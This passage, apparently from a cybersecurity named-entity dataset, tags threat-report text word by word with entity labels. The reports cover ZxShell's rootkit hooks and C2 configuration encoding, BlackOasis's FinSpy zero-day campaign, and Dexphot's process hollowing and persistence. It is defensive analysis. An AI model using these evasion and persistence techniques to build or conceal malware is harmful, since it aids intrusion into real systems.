handle O
( O
even O
the O
user-mode O
one O
) O
. O

The O
hook O
installed O
by O
ZxShell S-MAL
implements O
one O
of O
its O
filtering O
routine O
. O

It O
filters O
each O
attempt O
to O
open O
the O
ZxShell S-MAL
protected O
driver O
or O
the O
main O
DLL S-TOOL
, O
returning O
a O
reference O
to O
the O
“ O
netstat.exe S-FILE
” O
file O
. O

The O
protection O
is O
enabled O
to O
all O
processes O
except O
for O
ones O
in O
the O
following O
list O
: O
Svchost.exe S-FILE
, O
Lsass.exe S-FILE
, O
Winlogon.exe S-FILE
, O
Services.exe S-FILE
, O
Csrss.exe S-FILE
, O
ctfmon.exe S-FILE
, O
Rundll32.exe S-FILE
, O
mpnotify.exe S-FILE
, O
update.exe S-FILE
. O

If O
the O
type O
of O
the O
object O
that O
the O
system O
is O
trying O
to O
validate O
is O
a O
process O
, O
the O
hook O
code O
rewrites O
again O
the O
configuration O
data O
of O
the O
ZxShell S-MAL
service O
in O
the O
windows S-OS
registry O
. O

The O
last O
type O
of O
Kernel O
modification O
that O
ZxShell S-MAL
rootkit O
performs O
is O
the O
system O
call O
dispatcher O
( O
KiFastCallEntry O
) O
hook O
. O

In O
this O
manner O
, O
ZxShell S-MAL
is O
able O
to O
completely O
hide O
itself O
, O
intercepting O
the O
following O
Kernel O
API O
calls O
: O
ZwAllocateVirtualMemory O
, O
ZwOpenEvent O
, O
ZwQueryDirectoryFile O
, O
ZwWriteFile O
, O
ZwEnumerateKey O
, O
and O
ZwDeviceIoControlFile O
. O

Command B-TOOL
and I-TOOL
Control E-TOOL
Server O
: O
Sample O
( O
SHA256 S-ENCR
: O
1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c S-SHA2
) O
is O
configured O
to O
act O
as O
a O
server O
. O

The O
symbol O
“ O
g_bCreateListenSck O
” O
is O
set O
to O
1 O
. O

This O
means O
that O
, O
as O
seen O
above O
, O
the O
ZxShell S-MAL
Dll S-TOOL
is O
started O
in O
listening O
mode O
. O

It O
connects O
to O
the O
first O
remote O
C&C S-TOOL
that O
tries O
to O
contact O
it O
and O
succeeds O
in O
the O
handshake O
. O

The O
encrypted O
IP O
address O
is O
“ O
127.0.0.2 S-IP
” O
( O
used O
as O
loopback O
) O
and O
no O
connection O
is O
made O
on O
that O
IP O
address O
( O
due O
to O
the O
listening O
variable O
set O
to O
1 O
) O
. O

We O
used O
the O
ZxShell S-MAL
package O
for O
version O
3.10 O
( O
SHA256 S-ENCR
: O
1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4 S-SHA2
).The O
convenient O
thing O
about O
this O
is O
that O
the O
CNC B-TOOL
panel E-TOOL
worked O
with O
any O
version O
, O
3.10 O
and O
above O
. O

The O
buttons O
are O
all O
in O
Chinese O
, O
with O
the O
help O
of O
Google B-TOOL
Translate E-TOOL
and O
keen O
detective O
skills O
( O
read O
: O
button O
clicking O
) O
, O
we O
’ve O
deciphered O
the O
functionality O
. O

Once O
an O
infected O
machine O
connects O
, O
you O
see O
its O
information O
displayed O
in O
a O
selection O
box O
at O
the O
top O
. O

There O
are O
some O
built O
in O
functions O
on O
the O
side O
for O
the O
more O
common O
features O
. O

These O
include O
remote O
desktop O
, O
webcam O
spying O
, O
remote O
shell O
, O
and O
file O
management O
. O

You O
can O
also O
select O
a O
host O
and O
type O
help O
for O
a O
full O
list O
of O
commands O
. O

I O
have O
the O
same O
machine O
infected O
with O
two O
different O
version O
of O
ZxShell S-MAL
. O

Sending O
the O
help O
command O
for O
each O
, O
you O
can O
see O
the O
extra O
features O
added O
between O
version O
3.1 O
and O
3.2 O
. O

Keylogging S-ACT
, O
ZXARPS S-MAL
( O
IP O
and O
URL O
spoofing O
) O
, O
and O
SYNFlood S-ACT
are O
some O
of O
the O
interesting O
features O
added O
to O
version O
3.2 O
. O

In O
versions O
3.1 O
– O
3.21, O
the O
configuration O
info O
is O
xor S-ENCR
encoded O
with O
0x85 O
. O

This O
configuration O
info O
can O
be O
changed O
with O
a O
tool O
included O
in O
the O
ZxShell S-MAL
package O
. O

In O
versions O
3.22 O
and O
3.39 O
the O
routine O
changes O
. O

The O
new O
xor S-ENCR
encoding O
byte O
is O
0x5B O
. O

The O
data O
is O
stored O
in O
the O
last O
0x100 O
bytes O
of O
the O
file O
. O

The O
first O
8 O
bytes O
of O
data O
are O
static O
. O

Then O
there O
is O
the O
dll S-TOOL
install O
name O
, O
the O
domain O
, O
and O
the O
port O
. O

Knowing O
the O
obfuscation O
routines O
for O
this O
data O
we O
wrote O
a O
script O
to O
extract O
the O
URLs O
/ O
IPs O
and O
ports O
stored O
. O

The O
most O
common O
ports O
used O
are O
, O
80, O
1985, O
1986, O
and O
443 O
. O
1985 O
is O
the O
default O
port O
for O
the O
malware O
, O
1986 O
is O
the O
lazy O
variation O
of O
that O
port O
. O

Port O
80 O
and O
443 O
are O
the O
default O
ports O
for O
HTTP S-PROT
and O
HTTPS S-PROT
traffic O
. O

The O
next O
most O
common O
is O
port O
53 O
. O

This O
is O
used O
in O
some O
of O
the O
newer O
3.22 O
and O
3.39 O
samples O
. O

After O
that O
, O
the O
count O
for O
each O
port O
starts O
declining O
sharply O
. O

The O
choices O
are O
interesting O
though O
, O
many O
correspond O
to O
what O
looks O
like O
the O
birth O
year O
of O
the O
controller O
( O
ie O
. O
years O
in O
the O
late O
1980s S-TIME
and O
early O
1990s S-TIME
) O
, O
and O
others O
seem O
to O
match O
what O
year O
the O
malware O
was O
launched O
in O
( O
ie O
. O
in O
the O
2000s S-TIME
, O
relatively O
close O
to O
the O
current O
year O
) O
. O

Since O
this O
malware O
dates O
back O
to O
around O
2004 S-TIME
, O
there O
are O
many O
samples O
containing O
CNC S-TOOL
URLs O
from O
the O
3322.org S-URL
page O
. O

This O
page O
used O
to O
offer O
no-ip O
type O
hosting O
and O
was O
widely O
used O
by O
malware O
authors O
. O

So O
much O
so O
that O
Microsoft S-IDTY
did O
a O
takedown O
in O
2012 S-TIME
. O

A O
similar O
service O
, O
vicp.net S-URL
, O
is O
also O
seen O
in O
many O
of O
the O
domains O
. O

In O
the O
malware O
, O
if O
a O
domain O
is O
configured O
, O
it O
will O
retrieve O
domain.tld S-FILE
/ O
myIP
. O

txt S-FILE
. O

This O
file O
contains O
a O
list O
of O
IP O
addresses O
for O
the O
infected O
machine O
to O
connect O
back O
to O
. O

Otherwise O
, O
if O
an O
IP O
address O
is O
configured O
, O
it O
will O
connect O
directly O
to O
that O
IP O
address O
. O

We O
have O
written O
a O
simple O
C++ O
ZxShell S-MAL
Server O
that O
implements O
the O
communication O
and O
the O
handshake O
for O
the O
version O
3.10 O
and O
3.20 O
of O
the O
ZxShell S-MAL
DLL S-TOOL
. O

The O
implementation O
is O
quite O
simple O
: O
After O
the O
handshake O
, O
2 O
threads O
that O
deal O
with O
data O
transfer O
are O
spawned O
. O

Advanced O
persistent O
threats O
will O
remain O
a O
problem O
for O
companies O
and O
organizations O
of O
all O
sizes O
, O
especially O
those O
with O
high O
financial O
or O
intellectual O
property O
value O
. O

Group B-APT
72 E-APT
’s O
involvement O
in O
Operation B-ACT
SMN E-ACT
is O
another O
example O
of O
what O
sort O
of O
damage O
that O
can O
be O
done O
if O
organizations O
are O
not O
diligent O
in O
their O
efforts O
to O
secure O
their O
networks O
. O

ZxShell S-MAL
is O
one O
sample O
amongst O
several O
tools O
that O
Group B-APT
72 E-APT
used O
within O
their O
campaign O
. O

ZxShell S-MAL
is O
a O
sophisticated O
tool O
employed O
by O
Group B-APT
72 E-APT
that O
contains O
all O
kinds O
of O
functionality O
. O

Its O
detection O
and O
removal O
can O
be O
difficult O
due O
to O
the O
various O
techniques O
used O
to O
conceal O
its O
presence O
, O
such O
as O
disabling O
the O
host O
anti-virus O
, O
masking O
its O
installation O
on O
a O
system O
with O
a O
valid O
service O
name O
, O
and O
by O
masking O
outbound O
traffic O
as O
originating O
from O
a O
web O
browser O
. O

While O
other O
techniques O
are O
also O
utilized O
to O
conceal O
and O
inhibit O
its O
removal O
, O
ZxShell S-MAL
’s O
primary O
functionality O
is O
to O
act O
as O
a O
Remote B-TOOL
Administration I-TOOL
Tool E-TOOL
( O
RAT S-TOOL
) O
, O
allowing O
the O
threat O
actor O
to O
have O
continuous O
backdoor S-MAL
access O
on O
to O
the O
compromised O
machine O
. O

As O
our O
analysis O
demonstrates O
, O
ZxShell S-MAL
is O
an O
effective O
tool O
that O
can O
be O
ultimately O
used O
to O
steal O
user O
credentials O
and O
other O
highly O
valuable O
information O
. O

The O
threat O
posed O
by O
ZxShell S-MAL
to O
organizations O
is O
one O
that O
cannot O
be O
ignored O
. O

Organizations O
with O
high O
financial O
or O
intellectual O
property O
value O
should O
take O
the O
time O
to O
ensure O
their O
security O
requirements O
are O
met O
and O
that O
employee O
’s O
are O
educated O
about O
the O
security O
threats O
their O
organizations O
face O
. O


Threat O
Spotlight O
: O
Group B-APT
72 E-APT
, O
Opening O
the O
ZxShell S-MAL
. O

A O
well-funded O
, O
highly O
active O
group O
of O
Middle O
Eastern O
hackers O
was O
caught O
, O
yet O
again O
, O
using O
a O
lucrative O
zero-day S-VULNAME
exploit O
in O
the O
wild O
to O
break O
into O
computers O
and O
infect O
them O
with O
powerful O
spyware S-MAL
developed O
by O
an O
infamous O
cyberweapons O
dealer O
named O
Gamma B-APT
Group E-APT
. O

The O
incident O
, O
as O
described O
by O
security O
researchers O
with O
Moscow-based O
cybersecurity O
firm O
Kaspersky B-SECTEAM
Lab E-SECTEAM
, O
shines O
a O
rare O
light O
on O
the O
opaque O
although O
apparently O
vibrant O
market O
for O
software O
exploits O
and O
spyware S-MAL
, O
which O
in O
this O
case O
appears O
to O
have O
been O
purchased O
by O
a O
nation-state O
. O

The O
Middle O
Eastern O
hacker O
group O
in O
this O
case O
is O
codenamed O
“ O
BlackOasis S-APT
. O
” O
Kaspersky S-SECTEAM
found O
the O
group O
was O
exploiting O
a O
Adobe B-TOOL
Flash I-TOOL
Player E-TOOL
zero-day S-VULNAME
vulnerability O
( O
CVE-2016-4117 S-VULID
) O
to O
remotely O
deliver O
the O
latest O
version O
of O
“ O
FinSpy S-MAL
” O
malware O
, O
according O
to O
a O
new O
blog O
post O
published O
Monday S-TIME
. O

Adobe S-IDTY
issued O
a O
fix O
Monday S-TIME
to O
its O
users O
in O
the O
form O
of O
a O
software O
update O
. O

FinSpy S-MAL
, O
a O
final-stage O
payload O
that O
allows O
for O
an O
attacker O
to O
covertly O
learn O
what O
a O
target O
is O
talking O
about O
and O
who O
they O
are O
communicating O
with O
, O
is O
associated O
with O
Gamma B-APT
Group E-APT
— O
which O
goes O
by O
other O
names O
, O
including O
FinFisher S-APT
and O
Lench B-APT
IT I-APT
Solutions E-APT
. O

BlackOasis S-APT
in O
recent O
months O
sent O
a O
wave O
of O
phishing S-ACT
emails S-TOOL
. O

These O
emails S-TOOL
contained O
malicious O
Microsoft B-TOOL
Word I-TOOL
documents E-TOOL
with O
the O
aforementioned O
Flash B-VULNAME
Player I-VULNAME
zero-day E-VULNAME
hidden O
inside O
an O
embedded O
ActiveX B-TOOL
object E-TOOL
. O

In O
the O
past O
, O
BlackOasis S-APT
messages O
were O
designed O
to O
appear O
like O
news O
articles O
from O
2016 S-TIME
about O
political O
relations O
between O
Angola S-LOC
and O
China S-LOC
. O

The O
term O
zero-day S-VULNAME
is O
indicative O
of O
a O
software O
flaw O
that O
remains O
unknown O
to O
the O
software O
’s O
creator O
. O

Zero-days S-VULNAME
can O
be O
highly O
disruptive O
because O
they O
provide O
a O
window O
of O
time O
for O
an O
attacker O
to O
breach O
victims O
before O
the O
vendor O
is O
able O
to O
apply O
a O
software O
update O
to O
address O
the O
specific O
security O
hole O
. O

U.S S-LOC
. O
cybersecurity O
firm O
FireEye S-IDTY
also O
recently O
captured O
BlackOasis S-APT
activity O
as O
part O
of O
a O
similar O
incident O
where O
the O
group O
relied O
on O
a O
different O
zero-day S-VULNAME
exploit O
— O
more O
specifically O
, O
a O
SOAP B-TOOL
WSDL I-TOOL B-VULNAME
parser I-VULNAME E-TOOL I-VULNAME
code I-VULNAME
injection E-VULNAME
vulnerability O
— O
to O
install O
FinSpy S-MAL
onto O
a O
small O
number O
of O
devices O
. O

Again O
, O
the O
attacker O
’s O
intention O
appeared O
to O
be O
espionage O
. O
“ O
Unlike O
other O
FinFisher S-APT
customers O
or O
users O
who O
focus O
mostly O
on O
domestic O
operations O
, O
BlackOasis S-APT
focuses O
on O
external O
operations O
and O
go O
after O
a O
wide O
range O
of O
targets O
around O
the O
world O
, O
” O
explained O
Costin O
Raiu O
, O
director O
of O
the O
global O
research O
and O
analysis O
team O
at O
Kaspersky B-SECTEAM
Lab E-SECTEAM
. O

Gamma B-APT
Group E-APT
has O
been O
accused O
of O
selling O
its O
products O
to O
authoritarian O
regimes O
that O
can O
use O
the O
technology O
to O
both O
track O
dissidents O
and O
conduct O
foreign O
espionage O
over O
the O
internet O
. O

The O
discovery O
by O
Kaspersky S-SECTEAM
marks O
at O
least O
the O
fifth O
zero-day S-VULNAME
exploit O
used O
by O
BlackOasis S-APT
and O
exposed O
by O
security O
researchers O
since O
June B-TIME
2015 E-TIME
. O

It O
’s O
unclear O
whether O
the O
hackers O
are O
purchasing O
the O
exploits O
and O
spyware S-MAL
together O
, O
directly O
from O
Gamma B-APT
Group E-APT
, O
or O
if O
they O
were O
able O
to O
acquire O
some O
of O
the O
tools O
through O
other O
avenues O
. O
“ O
BlackOasis S-APT
’ O
interests O
span O
a O
wide O
gamut O
of O
figures O
involved O
in O
Middle O
Eastern O
politics O
and O
verticals O
disproportionately O
relevant O
to O
the O
region O
. O

This O
includes O
prominent O
figures O
in O
the O
United B-LOC
Nations E-LOC
, O
opposition O
bloggers O
and O
activists O
, O
and O
regional O
news O
correspondents O
, O
” O
a O
blogpost O
about O
Kaspersky S-SECTEAM
’s O
findings O
reads O
. O

The O
post O
continues O
, O
“ O
during O
2016 S-TIME
, O
we O
observed O
a O
heavy O
interest O
in O
Angola S-LOC
, O
exemplified O
by O
lure O
documents O
indicating O
targets O
with O
suspected O
ties O
to O
oil O
, O
money O
laundering O
, O
and O
other O
illicit O
activities O
. O

There O
is O
also O
an O
interest O
in O
international O
activists O
and O
think O
tanks O
… O
Victims O
of O
BlackOasis S-APT
have O
been O
observed O
in O
the O
following O
countries O
: O
Russia S-LOC
, O
Iraq S-LOC
, O
Afghanistan S-LOC
, O
Nigeria S-LOC
, O
Libya S-LOC
, O
Jordan S-LOC
, O
Tunisia S-LOC
, O
Saudi B-LOC
Arabia E-LOC
, O
Iran S-LOC
, O
Netherlands S-LOC
, O
Bahrain S-LOC
, O
United B-LOC
Kingdom E-LOC
and O
Angola S-LOC
. O
” O

Intent O
was O
clearly O
espionage O
in O
many O
cases O
, O
going O
outside O
of O
that O
"lawful O
surveillance" O
boundary.— O
Brian O
Bartholomew O
( O
@Mao_Ware O
) O
October B-TIME
16, I-TIME
2017 E-TIME
Brian O
Bartholomew O
, O
a O
senior O
security O
researcher O
with O
Kaspersky S-SECTEAM
, O
said O
on O
Twitter S-TOOL
that O
BlackOasis S-APT
’ O
espionage O
included O
non-traditional O
targets O
— O
“ O
going O
outside O
of O
that O
lawful O
surveillance O
boundary. O
” O

An O
advanced O
persistent O
threat O
group O
, O
previously O
identified O
by O
Microsoft S-IDTY
and O
codenamed O
Neodymium S-APT
, O
is O
closely O
associated O
with O
BlackOasis S-APT
’ O
operations O
. O

Last O
year O
, O
Microsoft S-IDTY
researchers O
described O
Neodymium S-APT
’s O
behavior O
as O
unusual O
: O
“ O
unlike O
many O
activity O
groups O
, O
which O
typically O
gather O
information O
for O
monetary O
gain O
or O
economic O
espionage O
, O
PROMETHIUM S-APT
and O
NEODYMIUM S-APT
appear O
to O
launch O
campaigns O
simply O
to O
gather O
information O
about O
certain O
individuals O
. O

These O
activity O
groups O
are O
also O
unusual O
in O
that O
they O
use O
the O
same O
zero-day S-VULNAME
exploit O
to O
launch O
attacks O
at O
around O
the O
same O
time O
in O
the O
same O
region O
. O

Their O
targets O
, O
however O
, O
appear O
to O
be O
individuals O
that O
do O
not O
share O
common O
affiliations. O
” O

A O
cursory O
review O
of O
BlackOasis S-APT
’ O
espionage O
campaign O
suggests O
there O
is O
some O
overlap O
between O
the O
group O
’s O
actions O
and O
Saudi B-LOC
Arabia E-LOC
’s O
geopolitical O
interests O
. O

For O
example O
, O
the O
targeting O
of O
Angolan B-IDTY
organizations E-IDTY
in O
mid-2016 S-TIME
coincidences O
directly O
with O
the O
rise O
of O
Angola S-LOC
’s O
oil O
business O
with O
China S-LOC
, O
which O
displaced O
Saudi B-LOC
Arabia E-LOC
as O
the O
number O
one O
exporter O
of O
crude O
oil O
to O
China S-LOC
at O
the O
time O
. O

All O
13 O
countries O
where O
Kaspersky S-SECTEAM
reportedly O
observed O
BlackOasis S-APT
activity O
are O
connected O
to O
Saudi B-LOC
Arabia E-LOC
in O
one O
of O
three O
ways O
: O
economically O
; O
from O
a O
national O
security O
perspective O
; O
or O
due O
to O
established O
policy O
agreements O
. O

In O
addition O
, O
Saudi B-LOC
Arabia E-LOC
is O
a O
known O
customer O
of O
spyware S-MAL
and O
has O
used O
the O
technology O
domestically O
, O
according O
to O
Citizen B-SECTEAM
Lab E-SECTEAM
, O
a O
cybersecurity O
and O
human-rights O
focused O
research O
laboratory O
. O

Kaspersky S-SECTEAM
’s O
research O
notes O
that O
BlackOasis S-APT
hacked O
into O
computers O
based O
in O
Saudi B-LOC
Arabia E-LOC
. O


Insights O
from O
one O
year O
of O
tracking O
a O
polymorphic O
threat O
. O

A O
little O
over O
a O
year O
ago O
, O
in O
October B-TIME
2018 E-TIME
, O
our O
polymorphic O
outbreak O
monitoring O
system O
detected O
a O
large O
surge O
in O
reports O
, O
indicating O
that O
a O
large-scale O
campaign O
was O
unfolding O
. O

We O
observed O
as O
the O
new O
threat O
attempted O
to O
deploy O
files O
that O
changed O
every O
20-30 O
minutes O
on O
thousands O
of O
devices O
. O

We O
gave O
the O
threat O
the O
name O
“ O
Dexphot S-MAL
, O
” O
based O
on O
certain O
characteristics O
of O
the O
malware O
code O
. O

The O
Dexphot S-MAL
attack O
used O
a O
variety O
of O
sophisticated O
methods O
to O
evade O
security O
solutions O
. O

Layers O
of O
obfuscation O
, O
encryption O
, O
and O
the O
use O
of O
randomized O
file O
names O
hid O
the O
installation O
process O
. O

Dexphot S-MAL
then O
used O
fileless O
techniques O
to O
run O
malicious O
code O
directly O
in O
memory O
, O
leaving O
only O
a O
few O
traces O
that O
can O
be O
used O
for O
forensics O
. O

It O
hijacked O
legitimate O
system O
processes O
to O
disguise O
malicious O
activity O
. O

If O
not O
stopped O
, O
Dexphot S-MAL
ultimately O
ran B-ACT
a I-ACT
cryptocurrency I-ACT
miner I-ACT
on I-ACT
the I-ACT
device E-ACT
, O
with O
monitoring O
services O
and O
scheduled O
tasks O
triggering O
re-infection O
when O
defenders O
attempt O
to O
remove O
the O
malware O
. O

In O
the O
months O
that O
followed O
, O
we O
closely O
tracked O
the O
threat O
and O
witnessed O
the O
attackers O
upgrade O
the O
malware O
, O
target O
new O
processes O
, O
and O
work O
around O
defensive O
measures O
. O

While O
Microsoft B-TOOL
Defender I-TOOL
Advanced I-TOOL
Threat I-TOOL
Protection E-TOOL
’s O
pre-execution O
detection O
engines O
blocked O
Dexphot S-MAL
in O
most O
cases O
, O
behavior-based O
machine O
learning O
models O
provided O
protection O
for O
cases O
where O
the O
threat O
slipped O
through O
. O

Given O
the O
threat O
’s O
persistence O
mechanisms O
, O
polymorphism O
, O
and O
use O
of O
fileless O
techniques O
, O
behavior-based O
detection O
was O
a O
critical O
component O
of O
the O
comprehensive O
protection O
against O
this O
malware O
and O
other O
threats O
that O
exhibit O
similar O
malicious O
behaviors O
. O

Microsoft B-TOOL
Defender E-TOOL
ATP O
data O
shows O
the O
effectiveness O
of O
behavioral O
blocking O
and O
containment O
capabilities O
in O
stopping O
the O
Dexphot S-MAL
campaign O
. O

Over O
time O
, O
Dexphot-related O
malicious O
behavior O
reports O
dropped O
to O
a O
low O
hum O
, O
as O
the O
threat O
lost O
steam O
. O

Our O
close O
monitoring O
of O
Dexphot S-MAL
helped O
us O
ensure O
that O
our O
customers O
were O
protected O
from O
the O
evolving O
threat O
. O

More O
importantly O
, O
one O
year O
’s O
worth O
of O
intelligence O
helped O
us O
gain O
insight O
not O
only O
into O
the O
goals O
and O
motivations O
of O
Dexphot S-MAL
’s O
authors O
, O
but O
of O
cybercriminals O
in O
general O
. O

The O
early O
stages O
of O
a O
Dexphot S-MAL
infection O
involves O
numerous O
files O
and O
processes O
. O

During O
the O
execution O
stage O
, O
Dexphot O
writes O
five O
key O
files O
to O
disk O
: O

1 O
、An O
installer O
with O
two O
URLs O
; O

2 O
、An O
MSI S-TOOL
package O
file O
downloaded O
from O
one O
of O
the O
URLs O
; O

3 O
、A O
password-protected O
ZIP O
archive O
; O

4 O
、A O
loader O
DLL S-TOOL
, O
which O
is O
extracted O
from O
the O
archive O
; O

5 O
、An O
encrypted O
data O
file O
that O
holds O
three O
additional O
executables O
that O
are O
loaded O
into O
system O
processes O
via O
process O
hollowing O
. O

Except O
for O
the O
installer O
, O
the O
other O
processes O
that O
run O
during O
execution O
are O
legitimate O
system O
processes O
. O

This O
can O
make O
detection O
and O
remediation O
more O
difficult O
. O

These O
legitimate O
system O
processes O
include O
msiexec.exe S-FILE
( O
for O
installing O
MSI S-TOOL
packages O
) O
, O
unzIP S-TOOL
. O

exe S-FILE
( O
for O
extracting O
files O
from O
the O
password-protected O
ZIP O
archive O
) O
, O
rundll32.exe S-FILE
( O
for O
loading O
the O
loader O
DLL S-TOOL
) O
, O
schtasks.exe S-FILE
( O
for O
scheduled O
tasks O
) O
, O
powershell.exe S-FILE
( O
for O
forced O
updates O
) O
. O

In O
later O
stages O
, O
Dexphot S-MAL
targets O
a O
few O
other O
system O
processes O
for O
process O
hollowing O
: O
svchost.exe S-FILE
, O
tracert.exe S-FILE
, O
and O
setup.exe S-FILE
. O

Based O
on O
Microsoft B-TOOL
Defender E-TOOL
ATP O
signals O
, O
SoftwareBundler B-MAL
: I-MAL
Win32/ICLoader E-MAL
and O
its O
variants O
are O
primarily O
used O
to O
drop O
and O
run O
the O
Dexphot B-MAL S-MAL I-MAL
installer E-MAL
. O

The O
installer O
uses O
two O
URLs O
to O
download O
malicious O
payloads O
. O

These O
are O
the O
same O
two O
URLs O
that O
Dexphot S-MAL
use O
later O
to O
establish O
persistence O
, O
update O
the O
malware O
, O
and O
re-infect O
the O
device O
. O

The O
installer O
downloads O
an O
MSI S-TOOL
package O
from O
one O
of O
the O
two O
URLs O
, O
and O
then O
launches O
msiexec.exe S-FILE
to O
perform O
a O
silent O
install O
. O

This O
is O
the O
first O
of O
several O
instances O
of O
Dexphot S-MAL
employing O
living-off-the-land O
techniques O
, O
the O
use O
of O
legitimate O
system O
processes O
for O
nefarious O
purposes O
. O

Dexphot S-MAL
’s O
package O
often O
contains O
an O
obfuscated O
batch O
script O
. O

If O
the O
package O
contains O
this O
file O
, O
the O
script O
is O
the O
first O
thing O
that O
msiexec.exe S-FILE
runs O
when O
it O
begins O
the O
installation O
process O
. O

The O
said O
obfuscated O
script O
is O
designed O
to O
check O
for O
antivirus O
products O
. O

Dexphot S-MAL
halts O
the O
infection O
process O
immediately O
if O
an O
antivirus O
product O
is O
found O
running O
. O

When O
we O
first O
began O
our O
research O
, O
the O
batch O
script O
only O
checked O
for O
antivirus O
products O
from O
Avast S-TOOL
and O
AVG S-TOOL
. O

Later O
, O
Windows B-TOOL
Defender I-TOOL
Antivirus E-TOOL
was O
added O
to O
the O
checklist O
. O

If O
the O
process O
is O
not O
halted O
, O
Dexphot S-MAL
decompresses O
the O
password-protected O
ZIP O
archive O
from O
the O
MSI S-TOOL
package O
. O

The O
password O
to O
this O
archive O
is O
within O
the O
MSI S-TOOL
package O
. O

Along O
with O
the O
password O
, O
the O
malware O
’s O
authors O
also O
include O
a O
clean O
version O
of O
unzIP S-TOOL
. O

exe S-FILE
so O
that O
they O
do O
n’t O
have O
to O
rely O
on O
the O
target O
system O
having O
a O
ZIP B-TOOL
utility E-TOOL
. O

The O
unzIP S-TOOL
. O

exe S-FILE
file O
in O
the O
package O
is O
usually O
named O
various O
things O
, O
such O
as O
z.exe S-FILE
or O
ex.exe S-FILE
, O
to O
avoid O
scrutiny O
. O

The O
ZIP O
archive O
usually O
contains O
three O
files O
: O
the B-TOOL
loader I-TOOL
DLL E-TOOL
, O
an O
encrypted O
data O
file O
( O
usually O
named O
bin.dat S-FILE
) O
, O
and O
, O
often O
, O
one O
clean B-TOOL
unrelated I-TOOL
DLL E-TOOL
, O
which O
is O
likely O
included O
to O
mislead O
detection O
. O

Dexphot S-MAL
usually O
extracts O
the O
decompressed O
files O
to O
the O
target O
system O
’s O
Favorites B-TOOL
folder E-TOOL
. O

The O
files O
are O
given O
new O
, O
random O
names O
, O
which O
are O
generated O
by O
concatenating O
words O
and O
numbers O
based O
on O
the O
time O
of O
execution O
( O
for O
example O
, O
C:\Users\<user>\Favorites\\Res.Center.ponse\<numbers> O
) O
. O

Msiexec.exe S-FILE
next O
calls O
rundll32.exe S-FILE
, O
specifying O
loader B-TOOL
DLL E-TOOL S-TOOL
( O
urlmon.7z S-FILE
in O
the O
example O
above O
) O
in O
order O
to O
decrypt B-MAL
the I-MAL
data I-MAL
file E-MAL
. O

The O
decryption O
process O
involves O
ADD S-ENCR
and O
XOR S-ENCR
operations O
, O
using O
a O
key O
hardcoded O
in O
the O
binary O
. O

The O
decrypted O
data O
contains O
three O
executables O
. O

Unlike O
the O
files O
described O
earlier O
, O
these O
executables O
are O
never O
written O
to O
the O
filesystem O
. O

Instead O
, O
they O
exist O
only O
in O
memory O
, O
and O
Dexphot S-MAL
runs O
them O
by O
loading O
them O
into O
other O
system O
processes O
via O
process B-TOOL
hollowing E-TOOL
. O

Process B-TOOL
hollowing E-TOOL
is O
a O
technique O
that O
can O
hide O
malware O
within O
a O
legitimate O
system O
process O
. O

It O
replaces O
the O
contents O
of O
the O
legitimate O
process O
with O
malicious O
code O
. O

Detecting O
malicious O
code O
hidden O
using O
this O
method O
is O
not O
trivial O
, O
so O
process B-TOOL
hollowing E-TOOL
has O
become O
a O
prevalent O
technique O
used O
by O
malware O
today O
. O

This O
method O
has O
the O
additional O
benefit O
of O
being O
fileless O
: O
the O
code O
can O
be O
run O
without O
actually O
being O
saved O
on O
the O
file O
system O
. O

Not O
only O
is O
it O
harder O
to O
detect O
the O
malicious O
code O
while O
it O
’s O
running O
, O
it O
’s O
harder O
to O
find O
useful O
forensics O
after O
the O
process O
has O
stopped O
. O

To O
initiate O
process B-TOOL
hollowing E-TOOL
, O
the B-TOOL
loader I-TOOL
DLL E-TOOL S-TOOL
targets O
two O
legitimate O
system O
processes O
, O
for O
example O
svchost.exe S-FILE
or O
nslookup.exe S-FILE
, O
and O
spawns O
them O
in O
a O
suspended O
state O
. O

The B-TOOL
loader I-TOOL
DLL E-TOOL S-TOOL
replaces O
the O
contents O
of O
these O
processes O
with O
the O
first O
and O
second O
decrypted O
executables O
. O

These O
executables O
are O
monitoring O
services O
for O
maintaining O
Dexphot S-MAL
’s O
components O
. O

The O
now-malicious O
processes O
are O
released O
from O
suspension O
and O
run O
. O

Next O
, O
the B-TOOL
loader I-TOOL
DLL E-TOOL S-TOOL
targets O
the O
setup.exe S-FILE
file O
in O
SysWoW64 S-OS
. O

It O
removes O
setup.exe S-FILE
’s O
contents O
and O
replaces O
them O
with O
the O
third O
decrypted O
executable O
, O
a O
cryptocurrency O
miner O
. O

Although O
Dexphot S-MAL
always O
uses O
a O
cryptocurrency O
miner O
of O
some O
kind O
, O
it O
’s O
not O
always O
the O
same O
miner O
. O

It O
used O
different O
programs O
like O
XMRig S-MAL
and O
JCE B-MAL
Miner E-MAL
over O
the O
course O
of O
our O
research O
. O

The O
two O
monitoring O
services O
simultaneously O
check O
the O
status O
of O
all O
three O
malicious O
processes O
. O

Having O
dual O
monitoring O
services O
provides O
redundancy O
in O
case O
one O
of O
the O
monitoring O
processes O
is O
halted O
. O

If O
any O
of O
the O
processes O
are O
terminated O
, O
the O
monitors O
immediately O
identify O
the O
situation O
, O
terminate O
all O
remaining O
malicious O
processes O
, O
and O
re-infect O
the O
device O
. O

The O
monitoring O
components O
also O
detect O
freshly O
launched O
cmd.exe S-FILE
processes O
and O
terminate O
them O
promptly O
. O

As O
a O
final O
fail-safe O
, O
Dexphot S-ACT
uses O
schtasks.exe S-FILE
to O
create O
scheduled O
tasks O
. O

This O
persistence O
technique O
is O
interesting O
, O
because O
it O
employs O
two O
distinct O
MITRE B-TOOL
ATT&CK E-TOOL
techniques O
: O
Scheduled B-TOOL
Task E-TOOL
and O
Signed B-TOOL
Binary I-TOOL
Proxy I-TOOL
Execution E-TOOL
. O

The O
scheduled O
tasks O
call O
msiexec.exe S-FILE
as O
a O
proxy O
to O
run O
the O
malicious O
code O
, O
much O
like O
how O
msiexec.exe S-FILE
was O
used O
during O
installation O
. O

Using O
msiexec.exe S-FILE
, O
a O
legitimate O
system O
process O
, O
can O
make O
it O
harder O
to O
trace O
the O
source O
of O
malicious O
activity O
. O

Furthermore O
, O
the O
tasks O
allow O
Dexphot S-MAL
to O
conveniently O
update O
the O
payload O
from O
the O
web O
every O
time O
the O
tasks O
run O
. O

They O
automatically O
update O
all O
of O
Dexphot S-MAL
’s O
components O
, O
both O
upon O
system O
reboot O
as O
well O
as O
every O
90 O
or O
110 O
minutes O
while O
the O
system O
is O
running O
. O

Dexphot S-MAL
also O
generates O
the O
names O
for O
the O
tasks O
at O
runtime O
, O
which O
means O
a O
simple O
block O
list O
of O
